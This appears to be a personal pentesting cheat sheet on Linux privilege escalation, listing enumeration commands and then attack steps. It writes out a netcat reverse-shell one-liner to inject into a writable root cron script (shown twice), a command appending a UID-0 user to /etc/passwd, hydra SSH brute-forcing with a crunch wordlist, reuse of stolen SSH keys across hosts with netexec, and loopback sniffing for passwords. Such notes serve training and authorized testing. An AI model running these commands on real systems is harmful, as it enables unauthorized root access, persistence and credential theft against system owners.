Linux Privilege Escalation

Linux Privilege Escalation ChecklistMedium

Enmeration

Basic Enemetation

# To gather user context information
id

# To enumerate all users:
cat /etc/passwd

# To check if passwd is world readable
ls -lah /etc/passwd

# This lists all user accounts on the system. Service accounts like www-data and sshd indicate that services like a web server and SSH server are running.

System Information Gathering

# Discover hostname
hostname

# To get OS release and version information:
cat /etc/issue
cat /etc/os-release
uname -a
uname -rs # To get info about kernal

Look for exploits related to the version of OS and kernal.

Finding internal Network information

# To list TCP/IP configuration of every network adapter:
ip a
ip addr
ifconfig

# To display routing table information:
# Displays the routing table, avoiding hostname resolution.
route -n
routel
route
ip route

# You can use command in scanning session to scan the internal network for available services

Process and Network Information

# List all Process
ps aux
ps auxf

# ps aux: Use when you want a flat overview of all running processes with detailed information.
# ps auxf: Use when you need to understand the parent-child relationships between processes (e.g., debugging process hierarchies).

# To display active network connections and listening ports:

ss -anp    # Check for listening ports and associated processes
netstat -anp # Display network connections and listening ports along with their associated processes

Firewall and Scheduled Tasks Information

# Collecting firewall information:
cat /etc/iptables/rules.v4

# Collecting scheduled task information:
# These commands list system-wide and user-specific scheduled tasks, which could be used for privilege escalation.
ls -lah /etc/cron*
cat /etc/crontab
crontab -l
sudo crontab -l

File Permissions and Installed Software

# Listing installed software:
dpkg -l

# Finding writable directories by the current user:
find / -writable -type d 2>/dev/null

# FInding world-writable directory
find / -type d -perm -o+w 2>/dev/null

# Look for unmounted drives:
cat /etc/fstab
mount
lsblk

# List of kernel modules:
lsmod
# To get more detail about specific module.
# Example:
/sbin/modinfo libata

SUID/GID Privilege Escalation

# Finding files with SUID/GID permissions set
find / -perm -u=s -type f 2>/dev/null

# Note we can see the content of the binary using `Strings` Command.
# Example:
strings /usr/bin/passwd_flag | grep -i "OS{"

More Enumeration help:

Linux Privilege Escalation - Exploit Notesexploit-notes.hdks.org

Basic Linux Privilege Escalation - g0tmi1kblog.g0tmi1k.com

PayloadsAllTheThings/Methodology and Resources/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Page not found - HackTricksbook.hacktricks.xyz

Payloads ALL things is very good github repo for help.

Automated tool for enumeration

Linpeas

# Kali linux location
/usr/share/peass/linpeas/linpeas.sh

# Send it to target system and run it.
chmod a+x linpeas.sh
./linpeas.sh

unix-privesc-check

# Kali linux location
/usr/bin/unix-privesc-check

# Send it to the target system and run it.
# Refer help for modes, I am using standard mode
./unix-privesc-check  standard

Looking for credential reuse

Credential reuse here refers to the practice where the username and password are identical, such as "kali" for both fields. This is a form of weak credential management and is often associated with default or temporary credentials.

# collect usernames.
cat /etc/passwd

# make a combination and try to log in.
# root: root
# enter as password when asked.
su root

Check .ssh Directory and Copy id_rsa file

# Check the Home directory of user you have access.
# Check the command history of the user.
# Check the ssh key.

# Go to the home directory and run below command:
ls -la

Try to use SSH key found in one machine to connect to other machine. There is chance that user may be repeated with same password.

Spreaing found ssh file

We can try to check if the found SSH private key corresponds to users on other hosts.

Way to do this is as follow:

netexec ssh $demo -u user_list.txt -p fireball  --key-file ../target_web01\(.245\)/id_rsa --port 2222

Checking for Sudo version

# Check for sudo version.
sudo -V

You can match your version found in the script below:

Exploiting Exposed Confidential information.

Inspecting Service Footprints & Privilege Escalation

# Check environment variables:
env
# If you are a root user then you can check the environment variable without switching to that user using the below command.
su - $username -c 'env'
# Example:
# su - kali -c 'env'

# suppose you find credentials of root user. Example,
# then try.
su sudo # enter found credential

# If required we can make Custom Wordlist Creation Using crunch:
crunch <min> <max> <character set> -t <pattern> -o <output filename>

# Example:
crunch 6 6 -t Lab%%% > wordlist

# Example for Cracking ssh
hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V

Tutorial: Create Wordlists with CrunchNull Byte

Privilege Escalation

# Try to Switch to root:
# if current user will have admin rights then it will switch without password
sudo -i

# List sudo capabilities:
sudo -l

We can see exploitation of these capabilities on GTFObin.

GTFOBinsgtfobins.github.io

Inspecting service footprints

# Monitor process behavior:
watch -n 1 "ps aux | grep pass"

# Capturing Credentials with tcpdump
# Not always have rights to run this tool
sudo tcpdump -i lo -A | grep "pass"

Abusing cron jobs

Checking Cron Job Logs

# Search for cron jobs in logs:
grep "CRON" /var/log/syslog

# For checking jobs under root user.

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Exploiting Writable Cron Jobs

# Check if we have write permission to the file
# Example:
ls -lah /home/joe/.scripts/user_backups.sh

# if we have write permission then inject this code in .sh file
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your IP> 4444 >/tmp/f" >> /home/joe/.scripts/user_backups.sh

# Start Netcat Listener and get the reverse shell.

Abusing Password authentication

# first check if /etc/passwd is world writeable or not.
ls -lah /etc/passwd

# if it is world writeable then
# make sure you do this steps in the vulnerable system (target system)
# Generate a password hash:
openssl passwd root # here `root` is password

# Add a new user with root privileges:
# Example
echo "root2:<GeneratePassword>:0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch to the new root user:
su root2

Insecure System Components

Abusing SetUid Binary

# If we find that there is SetUid set for binary then we will search that bianry in gtfobin and get the exploit.
# We will run the command accounding to command mentioned there.
# To find binary with SUID set
# Command:
find / -perm -u=s -type f 2>/dev/null

GTFOBinsgtfobins.github.io

Abusing Capabilities

# Search Command:
/usr/sbin/getcap -r / 2>/dev/null

# after getting binary list with capabilities use GTFObin to find exploit.

GTFOBinsgtfobins.github.io

Abusing Sudo

# Some times sudo command is not set to right binary. So, we can abuse it.
# if your are allowed to run command as root you will be able to list 
sudo -l
sudo --list

# Then use GTFOBin to find proper exploit.

GTFOBinsgtfobins.github.io

Exploiting kernel vulnerability

# Information Gathering
cat /etc/issue
uname -r
arch

# Search for exploit related to information gathered.
# Example:
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"

# Run the exploit in same OS. :-()
# Google it on how to combile and exploit the found exploit.

Revershell in .sh files

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP Address> 4444 >/tmp/f" >> filename.sh

PreviousAbusing GPO NextPrivilege escalation using MySQL & SQLi

Last updated 1 year ago

hashtagEnmeration

hashtagBasic Enemetation

hashtagSystem Information Gathering

hashtagFinding internal Network information

hashtagProcess and Network Information

hashtagFirewall and Scheduled Tasks Information

hashtagFile Permissions and Installed Software

hashtagSUID/GID Privilege Escalation

hashtagMore Enumeration help:

hashtagAutomated tool for enumeration

hashtagLinpeas

hashtagunix-privesc-check

hashtagLooking for credential reuse

hashtagCheck .ssh Directory and Copy id_rsa file

hashtagSpreaing found ssh file

hashtagChecking for Sudo version

hashtagExploiting Exposed Confidential information.

hashtagInspecting Service Footprints & Privilege Escalation

hashtagPrivilege Escalation

hashtagInspecting service footprints

hashtagAbusing cron jobs

hashtagChecking Cron Job Logs

hashtagExploiting Writable Cron Jobs

hashtagAbusing Password authentication

hashtagInsecure System Components

hashtagAbusing SetUid Binary

hashtagAbusing Capabilities

hashtagAbusing Sudo

hashtagExploiting kernel vulnerability

hashtagRevershell in .sh files

Enmeration

Basic Enemetation

System Information Gathering

Finding internal Network information

Process and Network Information

Firewall and Scheduled Tasks Information

File Permissions and Installed Software

SUID/GID Privilege Escalation

More Enumeration help:

Automated tool for enumeration

Linpeas

unix-privesc-check

Looking for credential reuse

Check .ssh Directory and Copy id_rsa file

Spreaing found ssh file

Checking for Sudo version

Exploiting Exposed Confidential information.

Inspecting Service Footprints & Privilege Escalation

Privilege Escalation

Inspecting service footprints

Abusing cron jobs

Checking Cron Job Logs

Exploiting Writable Cron Jobs

Abusing Password authentication

Insecure System Components

Abusing SetUid Binary

Abusing Capabilities

Abusing Sudo

Exploiting kernel vulnerability

Revershell in .sh files